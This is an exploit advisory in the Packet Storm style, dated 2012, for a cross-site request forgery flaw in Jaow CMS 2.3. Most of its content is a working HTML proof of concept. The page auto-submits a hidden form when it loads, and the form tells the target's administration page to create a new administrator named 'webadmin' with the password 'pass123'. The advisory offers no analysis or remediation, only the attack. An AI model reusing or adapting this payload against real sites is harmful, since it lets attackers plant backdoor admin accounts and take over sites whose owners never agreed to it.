Jaow CMS 2.3 Cross Site Request Forgery

2012-08-17T00:00:00
ID PACKETSTORM:115644
Type packetstorm
Reporter DaOne
Modified 2012-08-17T00:00:00

Description

                                        
                                            `##########################################  
[~] Exploit Title: Jaow CMS v2.3 CSRF Vulnerability  
[~] Author: DaOne [LCA]  
[~] Date: 15/8/2012  
[~] Software Link: http://www.jaow.net  
[~] Or: http://scripts.toocharger.com/fiches/scripts/jaow/5370.htm  
##########################################  
  
[#] [ CSRF Add Admin ]  
  
<html>  
<body onload="document.form0.submit();">  
<form method="POST" name="form0" action="http://[target]/administration/utilisateur.php">  
<input type="hidden" name="Nom" value="webadmin"/>  
<input type="hidden" name="Prenom" value="webadmin"/>  
<input type="hidden" name="Pseudo" value="webadmin"/>  
<input type="hidden" name="Mdp" value="pass123"/>  
</form>  
</body>  
</html>  
  
##########################################  
  
  
`